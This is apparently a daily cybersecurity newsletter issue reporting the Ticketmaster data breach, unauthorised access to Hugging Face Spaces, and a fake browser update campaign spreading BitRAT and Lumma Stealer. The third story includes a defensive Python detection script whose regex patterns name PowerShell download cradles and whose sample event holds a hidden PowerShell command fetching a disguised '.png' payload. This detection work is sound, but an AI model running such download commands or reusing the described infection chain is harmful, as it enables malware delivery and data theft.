ShinyHunters demands $500,000 for Ticketmaster hack

Jun 03 2024


Welcome to Gone Phishing, your daily cybersecurity newsletter that’s blasting off like #Starlink 🚀🚀🚀

Today’s hottest cybersecurity news stories:

  • 🎫 Ticketmaster hacked again! 560m affected. $500k demanded 💰

  • 🤗 Hugging Face detects unauthorised access to Spaces platform 🚉

  • ⚠️ Beware of fake browser update delivering BitRAT, Lumma Stealer 🐀

Ticketmaster? Hackers nick it faster 🙃🙃🙃

🚨 Ticketmaster Hack Exposes 560 Million Customers' Data! 🗃️

Live Nation, Ticketmaster’s owner, confirmed "unauthorised activity" on its database after hackers claimed to have stolen personal details of 560 million customers. The hacking group ShinyHunters demands a $500,000 ransom to prevent selling the data. 💰

What Was Stolen? 🤏

The stolen data includes:

  • Names

  • Addresses

  • Phone numbers

  • Partial credit card details 💳

Investigation Underway

Live Nation revealed in a filing to the SEC that a criminal threat actor offered the data for sale on the dark web on May 27. The exact number of affected customers remains unconfirmed.

Global Impact 🌎

The Australian government and the FBI are involved in addressing the breach. Live Nation is working to mitigate risks and notify users about the unauthorised access. 🌐

Linked Hacks 🔗

This breach may be connected to a larger hacking campaign. Santander recently confirmed a related data breach affecting 30 million customers. Data samples have been posted on BreachForums, a dark web hacking forum. 💻

ShinyHunters' History 📜

ShinyHunters has a notorious past, including a breach of 70 million AT&T customers in 2021 and 200,000 Pizza Hut customers in Australia last year. Despite the FBI’s crackdown in March 2023, the group remains active. 🚨

Past Security Issues 📅

Ticketmaster has faced security issues before, including a $10 million fine in 2020 for hacking a competitor and a cyber attack in November affecting Taylor Swift's Eras Tour ticket sales. 🎟️

Top Tips 🛡️

If you’re worried you may be affected:

  • Be alert for suspicious emails, messages, and calls.

  • Avoid sharing information with scammers exploiting the breach.

  • Watch out for messages about password resets, compensation, or missed deliveries.

  • Monitor your financial accounts for suspicious activity.

  • Change your Ticketmaster password, and the password on any other sites where you used the same one.

Stay safe and vigilant as this situation unfolds!


Hugging egg on Face? 👀🍳🙈

🚨 Hugging Face Security Breach Exposes AI Platform! 🤖

AI company Hugging Face revealed unauthorised access to its Spaces platform. It suspects that a subset of Spaces' secrets may have been accessed without authorisation.

What is Spaces? 🌐

Spaces allows users to create, host, and share AI and machine learning applications. It also serves as a discovery service for AI apps made by others on the platform. 🧠

Immediate Response 🗣️

Hugging Face is revoking compromised HF tokens and notifying affected users via email. They recommend refreshing keys or tokens and switching to fine-grained access tokens, which are now the default.

Impact and Investigation 💥

The number of impacted users remains undisclosed. The incident is under investigation, and law enforcement and data protection authorities have been alerted. 🚨

AI Sector Under Attack 🎯

The rapid growth of AI has made AI-as-a-service providers like Hugging Face prime targets for attackers. In early April, cloud security firm Wiz highlighted potential vulnerabilities in Hugging Face, including cross-tenant access and AI/ML model poisoning risks. 🔒

Previous Security Concerns ⚠️

Research by HiddenLayer identified flaws in Hugging Face's Safetensors conversion service, enabling hijacking of AI models for supply chain attacks. Malicious actors compromising Hugging Face could access private AI models, datasets, and critical applications, posing significant risks. ⚠️

Stay Secure 🛡️

Hugging Face users should update their tokens and stay vigilant against potential security threats. This breach underscores the importance of robust security measures in the growing AI sector. 🌐

Don’t get Bit by a RAT 🐀🐀🐀

🚨 Fake Browser Updates Delivering RATs and Info Stealers! 🐀

Cybersecurity firm eSentire has identified a new wave of cyberattacks using fake browser updates to distribute remote access trojans (RATs) and information-stealing malware such as BitRAT and Lumma Stealer (aka LummaC2).

The Attack Chain 🔗

  • Initial Contact: Victims are lured to a compromised website with JavaScript that redirects them to a fake browser update page ("chatgpt-app[.]cloud").

  • Download: The page prompts an automatic download of a ZIP archive file ("Update.zip") hosted on Discord.

  • Execution: Inside the ZIP file, a JavaScript file ("Update.js") executes PowerShell scripts to fetch additional payloads disguised as PNG images from a remote server.
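A way to hunt for the execution step of this chain in process-creation telemetry, as an added example that is not from eSentire or this newsletter: it scores events where a script host running a .js file spawns PowerShell, and adds weight when the script came out of an archive or PowerShell fetches a ".png". The event field names, sample events and score weights are assumptions, and the archive temp-folder patterns are heuristics.

```python
import re
from ntpath import basename  # parses Windows paths on any host OS

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
JS_FILE = re.compile(r"\.jse?\b", re.I)
# Heuristic: temp folders used when a file is opened straight from an archive
# (Explorer "Temp1_<name>.zip", 7-Zip "7zO...", WinRAR "Rar$...").
FROM_ARCHIVE = re.compile(r"\\Temp\\(Temp\d+_[^\\]+\.zip|7zO[^\\]*|Rar\$[^\\]*)\\", re.I)
FETCH = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient", re.I)
IMAGE_URL = re.compile(r"https?://\S+\.png\b", re.I)

def score_event(ev):
    """Score one process-creation event; returns (score, reasons)."""
    if basename(ev["image"]).lower() not in POWERSHELL:
        return 0, []
    if basename(ev["parent_image"]).lower() not in SCRIPT_HOSTS:
        return 0, []
    if not JS_FILE.search(ev["parent_cmd"]):
        return 0, []
    score, reasons = 2, ["script host running a .js file spawned PowerShell"]
    if FROM_ARCHIVE.search(ev["parent_cmd"]):
        score, reasons = score + 1, reasons + ["script opened from an extracted archive"]
    if FETCH.search(ev["cmd"]):
        score, reasons = score + 1, reasons + ["PowerShell fetches remote content"]
        if IMAGE_URL.search(ev["cmd"]):
            score, reasons = score + 1, reasons + ["fetched URL ends in .png"]
    return score, reasons

def triage(events, threshold=3):
    """Return (host, score, reasons) for events at or above the threshold."""
    scored = ((ev["host"],) + score_event(ev) for ev in events)
    return [hit for hit in scored if hit[1] >= threshold]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WS = r"C:\Windows\System32\wscript.exe"
# Constructed sample events (field names are assumptions, not a real log schema).
SAMPLE_EVENTS = [
    {"host": "WS-014", "image": PS, "parent_image": WS,
     "parent_cmd": r'wscript.exe "C:\Users\kim\AppData\Local\Temp\Temp1_Update.zip\Update.js"',
     "cmd": r'powershell.exe -w hidden -c "iwr https://cdn.example.invalid/a.png -OutFile $env:TEMP\a.png"'},
    {"host": "SRV-02", "image": PS, "parent_image": WS,
     "parent_cmd": r'wscript.exe "C:\Scripts\inventory.js"',
     "cmd": "powershell.exe -NoProfile -Command Get-ComputerInfo"},
    {"host": "WS-101", "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "parent_cmd": r"C:\Windows\explorer.exe",
     "cmd": "powershell.exe -c iwr https://intranet.example.invalid/logo.png"},
]
```

Calling `triage(SAMPLE_EVENTS)` flags only the WS-014 event; the administrative script on SRV-02 scores 2 and stays below the default threshold, which is where local tuning would start.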

PowerShell Payloads 🐚

The PowerShell scripts not only ensure persistence but also deploy a .NET-based loader used to deliver final-stage malware, including BitRAT and Lumma Stealer.

BitRAT: A versatile RAT capable of data theft, cryptocurrency mining, and remote control.

Lumma Stealer: A commercial information stealer that extracts data from web browsers, crypto wallets, and more, available for $250 to $1,000 per month since August 2022.

Why This Tactic Works ♟️

The fake browser update lure is effective because it leverages the trust associated with well-known software updates, maximising the reach and impact of the attack. This method has been commonly used to distribute various types of malware, including the notorious SocGholish malware. 🕵️‍♂️

Broader Threat Landscape 🏞️

ClearFake Campaign: A new variant discovered by ReliaQuest involves tricking users into executing malicious PowerShell code by claiming a browser display issue and instructing them to install a root certificate.

Webhard Distribution: The AhnLab Security Intelligence Center (ASEC) reported campaigns using webhards to distribute malicious installers for adult games and cracked software, leading to malware like Orcus RAT and XMRig miner.

Impact and Prevalence 💥

Lumma Stealer has become one of the most prevalent info stealers, with a significant increase in logs for sale on cybercrime forums. The malware’s effectiveness lies in its ability to infiltrate systems and exfiltrate data undetected.

Additional Findings 🧐

CryptoChameleon: Silent Push highlighted CryptoChameleon’s use of DNSPod[.]com nameservers for fast flux evasion techniques, allowing quick cycling of IPs linked to a single domain name, complicating traditional countermeasures.

Top Tips 🛡️

  • Be Wary of Fake Updates: Always verify the source of any software update prompt.

  • Monitor PowerShell Activity: Keep an eye on unexpected PowerShell executions.

  • Use Security Software: Employ robust antivirus and anti-malware tools.

  • Stay Informed: Keep up with cybersecurity news and updates to be aware of emerging threats.

By staying vigilant and informed, individuals and organisations can better protect themselves against these sophisticated and evolving cyber threats. 🌐


So long and thanks for reading all the phish!
